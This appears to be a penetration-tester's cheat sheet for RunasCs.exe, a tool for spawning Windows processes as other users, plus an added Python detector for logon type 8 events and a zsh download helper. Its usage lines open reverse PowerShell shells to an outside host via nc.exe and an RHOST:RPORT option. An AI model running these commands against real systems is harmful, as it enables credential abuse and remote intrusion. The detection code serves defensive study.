Spawn Processes as Other Users
RunasCs.exe
Project GitHub
https://github.com/antonioCoco/RunasCs/releases
Example Usage
Spawn Process with Network Credentials
# -l 8 : logontype 8 (NetworkCleartext)
# Launch reverse PowerShell session over Netcat socket
.\RunasCs.exe -d domain.tld -l 8 'username' 'password' 'C:\Windows\Temp\nc.exe 10.6.6.6 443 -e powershell.exe'
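From the defender's side, logon type 8 is recorded in Windows Security event 4624 with LogonType 8. The following is an added example (not part of the original notes or the RunasCs project) that filters 4624 records for cleartext network logons whose calling process is not on an allow-list. The sample events, the allow-list contents, the RunasCs.exe path and the expectation that the caller appears in the ProcessName field are assumptions.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Assumption: processes expected to perform cleartext network logons on this
# host (for example IIS Basic authentication). Tune per environment.
EXPECTED_CALLERS = {r"c:\windows\system32\inetsrv\w3wp.exe"}


def make_event(user, logon_type, process):
    """Build a constructed 4624 record using the event's EventData field names."""
    fields = {"TargetUserName": user, "LogonType": str(logon_type),
              "LogonProcessName": "Advapi", "ProcessName": process}
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4624</EventID></System>'
            f"<EventData>{data}</EventData></Event>")


def parse_logon(xml_text):
    """Return the EventData fields of a 4624 event, or None for other events."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4624":
        return None
    return {d.get("Name"): d.text or "" for d in root.findall("e:EventData/e:Data", NS)}


def unexpected_cleartext_logons(events):
    """List (user, process) for LogonType 8 logons from non-allow-listed callers."""
    hits = []
    for xml_text in events:
        ev = parse_logon(xml_text)
        if ev is None or ev.get("LogonType") != "8":
            continue
        if ev.get("ProcessName", "").lower() in EXPECTED_CALLERS:
            continue
        hits.append((ev.get("TargetUserName", ""), ev.get("ProcessName", "")))
    return hits


# Constructed sample events, not taken from a real host.
SAMPLE_EVENTS = [
    make_event("alice", 2, r"C:\Windows\System32\svchost.exe"),
    make_event("websvc", 8, r"C:\Windows\System32\inetsrv\w3wp.exe"),
    make_event("username", 8, r"C:\Users\Public\RunasCs.exe"),
]

if __name__ == "__main__":
    for user, process in unexpected_cleartext_logons(SAMPLE_EVENTS):
        print(f"LogonType 8 for {user} by {process}")
```

On a live host the same filter would run over 4624 events exported as XML from the Security log.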
Spawn Process with Logon
.\RunasCs.exe username_here password_here powershell.exe -r RHOST:RPORT
Easy Download
I put a function in my .zshrc file and run download_runascs to easily grab the latest version of the binary from GitHub releases.
function download_runascs() {
    # Use the "latest" slug to always grab the newest stable release
    local latest_release_url='https://github.com/antonioCoco/RunasCs/releases/latest'
    # Get the tagged release URL from the redirect's Location header
    # (header name matched case-insensitively); strip the trailing CR and spaces
    local latest_stable_url
    latest_stable_url=$(curl -sI "$latest_release_url" | grep -i '^location:' | awk '{print $2}' | tr -d '\r ')
    if [ -z "$latest_stable_url" ]; then
        echo "Could not resolve the latest RunasCs release URL" >&2
        return 1
    fi
    # Swap only the `/releases/tag/` path segment for `/releases/download/`
    local download_base_url
    download_base_url=$(echo -n "$latest_stable_url" | sed 's#/releases/tag/#/releases/download/#')
    # Version string is the last path component without its leading `v`
    local binary_version
    binary_version=$(basename "$latest_stable_url" | sed 's/^v//')
    local output_name='RunasCs.zip'
    local download_url="${download_base_url}/${output_name}"
    # Download and extract; stop if either step fails
    curl -fsL "$download_url" -o "$PWD/${output_name}" || return 1
    unzip -qq "$PWD/${output_name}" || return 1
    echo "RunasCs ${binary_version} binaries downloaded and unarchived in $PWD"
}